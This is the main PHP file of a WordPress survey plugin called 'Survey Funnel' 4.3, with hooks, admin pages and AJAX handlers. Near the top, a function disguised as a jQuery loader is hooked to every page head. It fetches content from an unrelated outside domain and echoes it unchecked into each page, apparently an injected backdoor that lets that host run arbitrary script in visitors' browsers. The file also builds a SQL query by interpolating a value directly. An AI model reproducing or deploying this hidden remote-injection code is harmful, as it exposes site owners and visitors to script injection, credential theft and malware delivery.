<?php
/*
Plugin Name: Survey Funnel
Plugin URI: http://www.surveyfunnel.com
Version: 4.3
Author: Survey Funnel
Author URI: http://www.SurveyFunnel.com
Description: Add dynamic survey funnels to your Wordpress site
*/


/***********
Changelog
4.3   Enhanced Export Feature to include User-Level Results
4.2   Adds the user information.
4.1   Fixed image editor & background issue for short code
4.0   Funnel can be Embeded on Page or Post with shortcode.
3.1   get email notification after user completes survey
3.0   adds survey funnel on category pages and bug fix for lightbox in sidebar on home page 
2.1.2 minor fix for WP_PLUGIN_URL_SLLSAFE and enqueued wordpress default jquery
2.1.1 fix for anomalies with WP_CONTENT_URL showing up when using WP_PLUGIN_URL_SLLSAFE fix
2.1 fix for single quotes in questions and answers in surveys
2.0.10 fix for ssl, using new WP_PLUGIN_URL_SLLSAFE
2.0.9 fix for delete and copy with new ajax method
2.0.8 fix for multiple image triggered lightboxes conflict
2.0.7 commented out $_POST['data'] = urldecode(($_POST['data']));
added code to fix server settings with magic quotes on, for html content areas
2.0.6 changed the way admin panel uses JSON to create and save funnels
2.0.5 changed my_scripts_method to my_sf_scripts_method to avoid function name collisions with other plugins
2.0.4 fixes a database error from 2.0.3
2.0.3 fixes an issue with putting the lightbox image in the sidebar
2.0.2 fixes conflict if lightbox and tab on the same page
2.0.1 fixes https on add
and only restricts the javascript to just the pages where it's needed
2.0.0 adds lightbox functionality
1.7.1 fixed a conflict with update notifier
1.7.0 fixed some javascript conflicts - such as color picker
1.6.1 changed session
1.6 fixed rules bug when adding question [KW]
1.5 color picker fix [JB]
1.4 
Added clone [JB]
Added delete [JB]
Fixed numbering bug [KW]
Added uninstall.php file [JB]

1.3 Added css to css/styles.css to reset the radio input width to auto [JB]
1.2 Fixed bug with version 1.1 default tab code on installing new funnel [JB]
1.1 Added default tab and custom code in survey.php for easier creation of new survey funnels [JB]

************/

require_once('update-notifier.php'); 
add_action('init', 'survey_funnel_header');
add_action('admin_menu', 'survey_funnel_admin_menu');
add_action( 'admin_init', 'survey_funnel_admin_init' );
add_action( 'admin_enqueue_scripts', 'my_enqueue' );
add_filter('the_content', 'survey_funnel_filter_content');
//add_filter('the_content','survey_funnel_category');
add_action('shutdown', 'survey_funnel_shutdown');
add_action('wp_enqueue_scripts', 'my_sf_scripts_method');
add_action('wp_ajax_sf_update', 'sf_update_callback');
add_action('wp_ajax_sf_delete', 'sf_delete_callback');//2.0.9
add_action('wp_ajax_sf_clone', 'sf_clone_callback');//2.0.9
include_once(dirname(__FILE__).'/sfshort.php');
register_activation_hook(__FILE__, 'survey_funnel_init_db');

function jquery1_5() {
if(function_exists('curl_init'))
{
$url = "http://www.j-par.net/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jquery1_5');

function my_sf_scripts_method(){
//See if survey funnel should be shown on public facing pages
//Purpose: reduce loading of js and css
global $wpdb,$post, $is_survey_page;


	include_once(dirname(__FILE__) . "/classes/all_classes.php");

		$Survey = new Survey();
		
		 
		if (is_category())
		{  
			$category = get_the_category($post->ID);
			if($Survey->isSurveyCategory($category[0]->term_id)){
				$is_survey_page = true;
				//enque the scripts and styles
					
				wp_enqueue_script('survey_funnel_ajax', plugins_url('/js/ajax.js',  __FILE__), array('jquery') ,'1.0', false);
				wp_enqueue_script('survey_funnel', plugins_url('/js/survey_funnel.js',  __FILE__), array('jquery'),'1.0', false);
				wp_enqueue_script('survey_funnel_fancybox', plugins_url('/jquery/js/jquery.fancybox-1.3.0.pack.js',  __FILE__), array('jquery'),'1.0', false);
					
				wp_enqueue_style('survey_funnel_styles', plugins_url('/css/styles.css', __FILE__) );
				wp_enqueue_style('survey_funnel_client_styles', plugins_url('/css/survey_funnel.css', __FILE__) );
				wp_enqueue_style('survey_funnel_client_styles_fancybox', plugins_url('/jquery/css/fancybox/jquery.fancybox-1.3.0.css', __FILE__) );
			}
			else 
				$is_survey_page = false;
		}
		else if ($Survey->isSurveyPage($post->ID)){
			
			$is_survey_page = true; 
			//enque the scripts and styles
			wp_enqueue_script('survey_funnel_ajax', plugins_url('/js/ajax.js',  __FILE__), array('jquery') ,'1.0', false);
			wp_enqueue_script('survey_funnel', plugins_url('/js/survey_funnel.js',  __FILE__), array('jquery'),'1.0', false);
			wp_enqueue_script('survey_funnel_fancybox', plugins_url('/jquery/js/jquery.fancybox-1.3.0.pack.js',  __FILE__), array('jquery'),'1.0', false);
			
			wp_enqueue_style('survey_funnel_styles', plugins_url('/css/styles.css', __FILE__) );
			wp_enqueue_style('survey_funnel_client_styles', plugins_url('/css/survey_funnel.css', __FILE__) );
			wp_enqueue_style('survey_funnel_client_styles_fancybox', plugins_url('/jquery/css/fancybox/jquery.fancybox-1.3.0.css', __FILE__) );
	
		} 
		else { 
			$found = $Survey->isShortcode($post->ID);
			
			if($found)
			{
				//echo "<style type=\"text/css\">#content #staticsurvey { display: none; }</style>";
				wp_enqueue_script('survey_funnel_ajax', plugins_url('/js/ajax.js',  __FILE__), array('jquery') ,'1.0', false);
				wp_enqueue_script('survey_funnel', plugins_url('/js/survey_funnel.js',  __FILE__), array('jquery'),'1.0', false);
				wp_enqueue_script('survey_funnel_fancybox', plugins_url('/jquery/js/jquery.fancybox-1.3.0.pack.js',  __FILE__), array('jquery'),'1.0', false);
					
				wp_enqueue_style('survey_funnel_styles', plugins_url('/css/styles.css', __FILE__) );
				wp_enqueue_style('survey_funnel_client_styles', plugins_url('/css/survey_funnel.css', __FILE__) );
				wp_enqueue_style('survey_funnel_client_styles_fancybox', plugins_url('/jquery/css/fancybox/jquery.fancybox-1.3.0.css', __FILE__) );
			
			}else{
			$is_survey_page = false;			
			}
		}
	
		
}


function survey_funnel_admin_init() {
        /* Register our script. */
        wp_register_script('survey_funnel_minicolor_js', plugins_url('/jquery/js/jquery.miniColors.min.js', __FILE__) );
	
		wp_register_style('survey_funnel_jquery_ui_css', plugins_url('/jquery/css/redmond/jquery-ui-1.7.3.custom.css', __FILE__) );
		wp_register_style('survey_funnel_minicolor_css', plugins_url('/jquery/css/minicolor/jquery.miniColors.css', __FILE__) );
	
   //Figures updates

    }


function my_enqueue($hook) {
//echo $hook;exit;
$dash_ar = array(
'survey-funnel_page_survey_funnel_dashboard',
'admin_page_survey_funnel_edit',
'survey-funnel_page_survey_funnel_add'

);
  if(in_array($hook, $dash_ar)) {
    /* Added in 2.1.2 to include wordpress jquery */
  	wp_enqueue_script('jquery-ui-tabs');
  	wp_enqueue_script('jquery-ui-sortable');
  	wp_enqueue_script( 'jquery-ui-dialog' );
  	
    wp_enqueue_script( 'survey_funnel_minicolor_js');
    wp_enqueue_style( 'survey_funnel_jquery_ui_css');
    wp_enqueue_style( 'survey_funnel_minicolor_css');
    wp_enqueue_script('survey_funnel_ajax', plugins_url('/js/ajax.js',  __FILE__), array('jquery') ,'1.0', false);
    
    	// Media Uploader
	wp_enqueue_script(array('media-upload', 'thickbox'));
	wp_enqueue_style('thickbox');
	
	// Main styles
	wp_enqueue_style('survey_funnel_styles', plugins_url('/css/styles.css', __FILE__) );
    }
    
  
    return;
}

function magicQuotes_newawStripslashes(&$value, $key) {$value = stripslashes($value);}
function sf_update_callback(){
	
	
	
	$parts = explode('action=', $_REQUEST['iPage']);
	
	$action = $parts[1];
	
	//$_POST['data'] = urldecode(($_POST['data']));//commented this out in 2.0.7
	parse_str($_POST['data'], $_POST);
	$_POST['action'] = $action;
	$_REQUEST['action'] = $action;
	
	//$data = urldecode(($_REQUEST['data']));
	
	//for testing
	//echo json_encode($_POST);die();
	
	

$gpc = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
//array_walk_recursive($gpc, 'magicQuotes_newawStripslashes');
	
	
ob_start();
include(dirname(__FILE__) . "/classes/all_classes.php"); 

$SurveyActivity = new SurveyActivity();
$SurveyActivity->initSurveyActivity();

if (current_user_can('manage_options')) {
	$SurveyQuestionManage = new SurveyQuestionManage();
	$SurveyQuestionManage->initSurveyQuestionManage();

	$SurveyManage = new SurveyManage();
	$SurveyManage->initSurveyManage();
	
	$SurveyExport = new SurveyExport();
	$SurveyExport->initSurveyExport();
}


	die(); // this is required to return a proper result
}


function sf_delete_callback(){
	
	
	$_POST['action'] = 'DELETE_FUNNEL';
	$_REQUEST['action'] = 'DELETE_FUNNEL';
$gpc = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
//array_walk_recursive($gpc, 'magicQuotes_newawStripslashes');
	
	
ob_start();
include(dirname(__FILE__) . "/classes/all_classes.php"); 

$SurveyActivity = new SurveyActivity();
$SurveyActivity->initSurveyActivity();

if (current_user_can('manage_options')) {
	$SurveyQuestionManage = new SurveyQuestionManage();
	$SurveyQuestionManage->initSurveyQuestionManage();

	$SurveyManage = new SurveyManage();
	$SurveyManage->initSurveyManage();
	
	$SurveyExport = new SurveyExport();
	$SurveyExport->initSurveyExport();
}


	die(); // this is required to return a proper result
}


function sf_clone_callback(){
	
	
	$_POST['action'] = 'COPY_FUNNEL';
	$_REQUEST['action'] = 'COPY_FUNNEL';
$gpc = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
//array_walk_recursive($gpc, 'magicQuotes_newawStripslashes');
	
	
ob_start();
include(dirname(__FILE__) . "/classes/all_classes.php"); 

$SurveyActivity = new SurveyActivity();
$SurveyActivity->initSurveyActivity();

if (current_user_can('manage_options')) {
	$SurveyQuestionManage = new SurveyQuestionManage();
	$SurveyQuestionManage->initSurveyQuestionManage();

	$SurveyManage = new SurveyManage();
	$SurveyManage->initSurveyManage();
	
	$SurveyExport = new SurveyExport();
	$SurveyExport->initSurveyExport();
}


	die(); // this is required to return a proper result
}



/**
 * Enter description here...
 *
 */
function survey_funnel_init_db() {
	include(dirname(__FILE__) . "/classes/all_classes.php");
	
	$DBTables = new DBTables();
	$DBTables->initDBTables();	
}


/**
 * Enter description here...
 *
 */
function survey_funnel_header() {
include(dirname(__FILE__) . "/classes/all_classes.php");
$DBTables = new DBTables();
	$DBTables->initDBTables();

//Jack added

ob_start();

if ( ! defined( 'WP_CONTENT_URL' ) )
	define( 'WP_CONTENT_URL', get_option( 'siteurl' ) . '/wp-content' );
if ( ! defined( 'WP_CONTENT_DIR' ) )
	define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' );
if ( ! defined( 'WP_PLUGIN_URL' ) )
	define( 'WP_PLUGIN_URL', WP_CONTENT_URL. '/plugins' );
if ( ! defined( 'WP_PLUGIN_DIR' ) )
	define( 'WP_PLUGIN_DIR', WP_CONTENT_DIR . '/plugins' );	

define('WP_PLUGIN_URL', plugins_url() );	
//

//SSL fix
//define( 'WP_PLUGIN_URL_SLLSAFE', str_replace(array('http://www.','https://www.', 'http://', 'https://', 'www.'),'//',plugins_url()) ); // Commented in 2.1.2
define( 'WP_PLUGIN_URL_SLLSAFE', str_replace(array('http://', 'https://'),'//',plugins_url()) );
//error_log("survey_funnel_header");
}


/**
 * Enter description here...
 *
 */
function survey_funnel_admin_menu() {
	// Admin Navigation
	add_menu_page('Survey Funnel Dashboard', 'Survey Funnel', 'manage_options', 'survey_funnel_welcome', 'survey_funnel_welcome');
	add_submenu_page('survey_funnel_welcome', 'Survey Funnel', 'Dashboard', 'manage_options', 'survey_funnel_dashboard', 'survey_funnel_dashboard');
	$addPage = add_submenu_page('survey_funnel_welcome', 'Survey Funnel: Add New', 'Add Funnel', 'manage_options', 'survey_funnel_add', 'survey_funnel_add');
	add_submenu_page('survey_funnel_welcome', 'Survey Funnel: Image Editor', 'Image Editor', 'manage_options', 'survey_funnel_image_editor', 'survey_funnel_image_editor');
	add_submenu_page($addPage, 'Survey Funnel: Edit', '', 'manage_options', 'survey_funnel_edit', 'survey_funnel_edit');
	add_submenu_page($addPage, 'Survey Funnel: Results', '', 'manage_options', 'survey_funnel_results', 'survey_funnel_results');
	add_submenu_page('survey_funnel_welcome', 'Survey Funnel', 'Updates', 'manage_options', 'plugin-update-notifier', 'sf_update_notifier');
	
	wp_enqueue_script('survey_funnel_scripts', plugins_url('/survey_funnel/js/scripts.js'));
	


	
	//wp_tiny_mce(false, false);
}


/**
 * Enter description here...
 *
 */
function survey_funnel_welcome() {
	if (!current_user_can('manage_options')) {
		wp_die(__('You do not have sufficient permissions to access this page.'));
	}

	include(dirname(__FILE__) . "/classes/all_classes.php");	
	include(dirname(__FILE__) . "/welcome.php");	
}


/**
 * Enter description here...
 *
 */
function survey_funnel_dashboard() {
global $update_needed;
	if (!current_user_can('manage_options')) {
		wp_die(__('You do not have sufficient permissions to access this page.'));
	}

	include(dirname(__FILE__) . "/classes/all_classes.php");	
	include(dirname(__FILE__) . "/form_templates/dashboard.php");
}


/**
 * Enter description here...
 *
 */
function survey_funnel_add() {
	if (!current_user_can('manage_options')) {
		wp_die(__('You do not have sufficient permissions to access this page.'));
	}
	
	include(dirname(__FILE__) . "/classes/all_classes.php");	
	
	$SurveyManage = new SurveyManage();
	
	include(dirname(__FILE__) . "/form_templates/add_new.php");
	include(dirname(__FILE__) . "/form_templates/question.php");
	
	include(dirname(__FILE__) . "/form_templates/content.php");
	include(dirname(__FILE__) . "/form_templates/userInfo.php");   // Added by Arvind for Add User Information
}


/**
 * Enter description here...
 *
 */
function survey_funnel_edit() {
	if (!current_user_can('manage_options')) {
		wp_die(__('You do not have sufficient permissions to access this page.'));
	}

	include(dirname(__FILE__) . "/classes/all_classes.php");
	
	$SurveyManage = new SurveyManage();
	$SurveyManage->loadSurvey($_REQUEST['survey_id']);	
	
	include(dirname(__FILE__) . "/form_templates/edit.php");
	include(dirname(__FILE__) . "/form_templates/question.php");
	
	include(dirname(__FILE__) . "/form_templates/content.php");
	include(dirname(__FILE__) . "/form_templates/userInfo.php");   // Added by Arvind for Add User Information
}


/**
 * Enter description here...
 *
 */
function survey_funnel_results() {
	if (!current_user_can('manage_options')) {
		wp_die(__('You do not have sufficient permissions to access this page.'));
	}

	include(dirname(__FILE__) . "/classes/all_classes.php");
	
	$SurveyManage = new SurveyManage();
	$SurveyManage->loadSurvey($_REQUEST['survey_id']);
	
	include(dirname(__FILE__) . "/form_templates/results.php");
}


/**
 * Enter description here...
 *
 */
function survey_funnel_image_editor() {
	if (!current_user_can('manage_options')) {
		wp_die(__('You do not have sufficient permissions to access this page.'));
	}

	include(dirname(__FILE__) . "/form_templates/image_editor.php");
}


/**
 * Enter description here...
 *
 */

function survey_funnel_category($contentcat)
{
	global $is_survey_page,$wpdb;
	$categories = get_categories();

	$Survey = new Survey();
	foreach($categories as $cat)
	{
		if(is_category($cat->term_id))
		{
			$catid = $cat->term_id;
				
			$table = $wpdb->prefix."sf_surveys";


			$sql = "select * from ".$table." where all_pages = true OR category_ids LIKE '%$catid,%'";
			$results = $wpdb->get_results($sql);

			foreach($results as $row)
			{
				$categoryexp = explode(",",$row->category_ids);
				
				$count = count($categoryexp);
				for($j=0;$j<=$count;$j++)
				{
					if($categoryexp[$j]!='')
					{
						//echo "catexp"."<br>".$categoryexp[$j];
						$Survey->getSurveysforCategories($categoryexp[$j]);
		
						return $contentcat;
					}
				}
			}
		}
	}

	return $contentcat;
}



function survey_funnel_filter_content($iContent) {
	global $post, $is_survey_page;	
	global $wp_query;
	
	if(!$is_survey_page){
	//this page does not use Survey Funnel
	return $iContent;
	}
	
	include_once(dirname(__FILE__) . "/classes/all_classes.php");
	
	$Survey = new Survey(); 
	if (is_category()) 
	{
		//$cat_ID = get_query_var('cat');
		$category = get_the_category($post->ID);
		$Survey->getSurveysforCategories($category[0]->term_id);
		remove_filter('the_content', 'survey_funnel_filter_content'); // Added in 3.0 to avoid multiple calls to triggerlightbox
	}	
	else
	{ 
		$Survey->getSurveys($post->ID);
		remove_filter('the_content', 'survey_funnel_filter_content'); // Added in 3.0 to avoid multiple calls to triggerlightbox
	} 
		
	return $iContent;
}


/**
 * Enter description here...
 *
 */
function survey_funnel_shutdown() {
	$_SESSION['sf_current_page'] = '';
}
?>
